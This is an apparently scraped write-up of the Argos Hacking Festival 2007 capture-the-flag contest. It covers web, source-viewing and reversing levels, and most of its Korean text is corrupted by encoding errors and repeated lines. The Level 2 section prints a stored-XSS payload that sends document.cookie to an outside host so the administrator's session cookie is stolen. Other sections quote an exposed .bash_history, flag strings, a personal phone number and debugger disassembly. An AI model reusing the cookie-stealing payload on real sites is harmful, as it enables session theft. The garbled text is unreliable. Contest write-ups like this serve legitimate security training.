Upload
others
View
2
Download
0
Embed Size (px)
Citation preview
- Argos Hacking Festival 2007 -- Argos Hacking Festival 2007 -- Argos Hacking Festival 2007 -- Argos Hacking Festival 2007 -
2007. 1. 15~16
ģ¤ģģø([email protected])
http://168.188.130.242/ahf2006/ (jhysu)
=================================== Level1=================================== Level1=================================== Level1=================================== Level1
<center>
<a href=http://www.spidynamics.com/assets/documents/HackingFeeds.pdf><img
src=../img/rss.jpg border=0></a><br>
ģ ź·øė¦¼ģ ķ“ė¦ķģė©“ ģ ė¬øģ ė„¼ ė¤ģ“ė°ģ¼ģ¤ ģ ģģµė<font color=#AAAAAA> (PDF)
ė¤.</font><br><br><script>alert('AHF2006 uses a rss feed, just for fun
ģ ė°ķģ½ ģģ ė°ķė ģ·Øģ½ģ ģ ė:D');</script>RSS/ATOM Feed Injection 2006
ė¤ ģ·Øģ½ģ ģ“ ģģ§ ėė¶ė¶ģ ķė”ź·øėØģģ ģ”“ģ¬ķ©ėė¤ ģģ¼ė”.<br>XSS RSS Reader .<br>
ģ“ģ ėķ ģ£¼ģź° ķģķģ§ ģģź¹ģ¶ė¤ģ^^<br><iframe src=./rss_password width=0<iframe src=./rss_password width=0<iframe src=./rss_password width=0<iframe src=./rss_password width=0
height=0>height=0>height=0>height=0>
=================================== Level 3=================================== Level 3=================================== Level 3=================================== Level 3
ģģ¤ė³“źø°
ķģ¼ ė¤ģ“ė”ė ėØdefault.css .
========================================== Level8========================================== Level8========================================== Level8========================================== Level8
manlikessexygirl
========================================== Level7========================================== Level7========================================== Level7========================================== Level7
ģ¤ķ ź°ė øź·øėķ¼ ģķø.....
ķģ¼ģ“ ėķėØpwd.txt ...
010 - 6479 - 6988 call me
ģ ķķė©“ ėµ ģė ¤ģ¤....
========================================== Level5========================================== Level5========================================== Level5========================================== Level5
ģ ģ źµ¬źøė§ ķė¤badboys URL .
========================================== Level6========================================== Level6========================================== Level6========================================== Level6
ģė¬“ė°ģė ģģ¤ė³“źø° ź° ģėė° ź·ø ķģ¼ģ ģėģ ź°ģ“ ķ¬ķøė” ģģ²ģ-> /css/embed.js , ~~.css 80
ķė¤ ģ“ė ź² ģķ¬ķø ėģ“ ģė¤. import(ahf~~~) .
========================================== Level2========================================== Level2========================================== Level2========================================== Level2
ź²ģķģ ź³µź²©ģ ķė©“ ėØto.ahf2006 XSS .
ģ“ė°ģģ¼ė”....
ź·øė¬ė©“ ź“ė¦¬ģź° ģ½ģ¼ė©“ ģæ ķ¤ź° ģ ź²½ė”ė” ģ ģ„ģ“ ėė¤.
Social_is_best_hacking
# telnet 168.188.130.242 80
Trying 168.188.130.242...
Connected to 168.188.130.242.
Escape character is '^]'.
http://168.188.130.242/ahf2006/css/embed.js
ģ¶ķķ©ėė¤ ģ ėµģ ėė¤<font color=#ffffff><small> ! level6 !</small></font><br><font
ķØģ¤ģėė ģ ėė¤color=#ffffff><small> HackTheFlashActionScript .</small></font>
<script>self.location='http://168.188.130.242/ahf2006/';</script>Connection
closed by foreign host.
<script language=javascript>
window.open("http://xxx.xxx.xxx.xxx/~slaxcore/aa.php?cook="+document.cooki
e);</script>
========================================== Level4========================================== Level4========================================== Level4========================================== Level4
ģģ¤ė³“źø° ķė©“ ģėģ ź²½ė” ģģ¬..(~admin) ...
http://168.188.130.242/~admin/.bash_history ķģ¼ ź²½ė” ė° ķģ¼ėŖ ģ ģ¶
ll
echo "binish is handsome! :p"
vi css/default.css
cd main/
ll
vi head.php
cd ../img
ll
cd ../main/
ll
vi head.php
cd ..
ll
cd ..
ll
cd /usr/local/apache/htdocs/
ll
ll
cd css/
cd ..
ll
cd
ll
cd ahf2006/
ll
d main/
ll
cd main/
vi head.php
ll
mv udcsc.php contact.php
vi hoe
ll
echo "x15kangx is the new face of argos!"
vi head.php
vi tail.php
vi head.php
vi home.php
vi head.php
vi home.php
vi tail.php
vi home.php
vi head.php
vi tail.php
vi head.php
vi tail.php
vi head.php
vi home.php
vi head.php
vi tail.php
vi head.php
vi tail.php
vi home.php
vi head.php
vi home.php
vi head.php
vi home.php
vi tail.php
vi home.php
vi head.php
vi tail.php
vi home.php
vi head.php
vi tail.php
vi head.php
vi home.php
vi head.php
vi home.php
vi head.php
vi home.php
vi head.php
vi home.php
vi head.php
wget "http://sexy_site/ya_han_movie.avi"
vi home.php
ll
vi intro.php
vi ../join/join
vi ../join/join.php
vi level.php
vi ../board/board_list.php
vi head.php
vi contact.php
i home.php
vi home.php
vi head.php
ll
vi home.php
vi head.php
ll
vi ../board/board_list.php
vi contact.php
vi ../board/board_list.php
vi head.php
vi level.php
vi re
vi ../join/join.php
exit
x
cd ahf2006/
ll
cd main
ll
vi head.php
ll
vi default.css default.css
vi default.css
vi default.css
ll
cd ..
cd /home/admin/public_html/admin/
vi index.php
vi /usr/local/apache/conf/httpd.conf
/usr/local/apache/bin/htpasswd -c /home/admin/public_html/auth admin/usr/local/apache/bin/htpasswd -c /home/admin/public_html/auth admin/usr/local/apache/bin/htpasswd -c /home/admin/public_html/auth admin/usr/local/apache/bin/htpasswd -c /home/admin/public_html/auth admin
/usr/local/apache/bin/apachectl restart
ll
cd main
ll
vi intro.php
vi intro.php
ll
vi member.php
ll
cd ..
ģ ė¹Øź° źøģØė¶ė¶ģ“ ėģ¬ź²Ø ė³“ģģ¼ ķ ė¶ė¶ģ....
ll
vi member.
vi member.php
ll
cd join
ll
cd ..
ll
cd css
vi default.css
ll
cd ..
ll
vi main/home.php
cd css/
ll
vi default.css
ll
cd ..
cd ..
ll
ll
cd ../dhf2006/
ll
vi main/home.php
vi main/head.php
cd
cd ahf2006/
ll
vi css/default.css
ll
pwd
cd ..
=================================================Level9=================================================Level9=================================================Level9=================================================Level9
ė¦¬ė²ģ±ģ ķµķ ź°ģ ģ«ģ ķ©ģ źµ¬ķė ė¬øģ 2006
004066F6 . 8D7424 20 LEA ESI,DWORD PTR SS:[ESP+20]
004066FA > 8B2E MOV EBP,DWORD PTR DS:[ESI]
ķ©ģ ģ ģ ģ„004066FC . 03FD ADD EDI,EBP ; edi
004066FE . 40 INC EAX
004066FF . 894424 1C MOV DWORD PTR SS:[ESP+1C],EAX
00406703 . 50 PUSH EAX
00406704 . 8D4424 14 LEA EAX,DWORD PTR SS:[ESP+14]
00406708 . 68 7C014300 PUSH AHF2006.0043017C ; ASCII "%d"
0040670D . 50 PUSH EAX
0040670E . E8 87430100 CALL AHF2006.0041AA9A
00406713 . 83C4 0C ADD ESP,0C
00406716 . 8D4C24 10 LEA ECX,DWORD PTR SS:[ESP+10]
ė²ģ§ø ź°0040671A . 68 70014300 PUSH AHF2006.00430170 ; :
0040671F . E8 14930100 CALL AHF2006.0041FA38
00406724 55 PUSH EBP00406724 55 PUSH EBP00406724 55 PUSH EBP00406724 55 PUSH EBP ķ©ģ ģ¶ė „; push edi ( )
00406725 . 8D4C24 18 LEA ECX,DWORD PTR SS:[ESP+18]
00406729 . 68 7C014300 PUSH AHF2006.0043017C ; ASCII "%d"
0040672E . 51 PUSH ECX
0040672F . E8 66430100 CALL AHF2006.0041AA9A
00406734 . 83C4 0C ADD ESP,0C
00406737 . 8D5424 14 LEA EDX,DWORD PTR SS:[ESP+14]
0040673B . 8D4C24 10 LEA ECX,DWORD PTR SS:[ESP+10]
0040673F . 52 PUSH EDX
00406740 . E8 1A930100 CALL AHF2006.0041FA5F
00406745 . 8B4424 10 MOV EAX,DWORD PTR SS:[ESP+10]
00406749 . 8B4C24 18 MOV ECX,DWORD PTR SS:[ESP+18]
0040674D . 53 PUSH EBX
0040674E . 53 PUSH EBX
0040674F . 50 PUSH EAX
00406750 E8 B67A0100 CALL AHF2006.0041E20B
00406755 8B4424 1C MOV EAX,DWORD PTR SS:[ESP+1C]
00406759 83C6 04 ADD ESI,4
0040675C 3D D6070000 CMP EAX,7D6
00406761 ^ 7C 97 JL SHORT AHF2006.004066FA
00406763 . 8D4C24 14 LEA ECX,DWORD PTR SS:[ESP+14]LEA ECX,DWORD PTR SS:[ESP+14]LEA ECX,DWORD PTR SS:[ESP+14]LEA ECX,DWORD PTR SS:[ESP+14]
00406767 . 889C24 801F00>MOV BYTE PTR SS:[ESP+1F80],BL
ģģ ė„¼push ebp ė” ģģ push edi ķģ¬ ģ ģ„ķź³ ėģģ ķė”ź·øėØģ ģ¤ķģķ¤ė©“ ėģ ė ķ©ė¤ģ“ ģ¶ė „ģ“
ė ź²ģ“ė¤ ģķ° ėė„“ź³ ģģ¼ė©“ ź³§ ź°ģ ķ©ģ“ ģ¶ė „ėØ. 2006 .
ģėė©“ ėė²ź±°ģģ ģėģŖ½ ė¶ė¶ģ ėøķ¬ė„¼ ź±øź³ ģ¤ķģ ź³ģ ģķ¤ė©“ ė ģ§ģ¤ķ°ģ ķ©ģ“ ģ ģ„ģ“ ė ź²ģ“ė¤edi
99366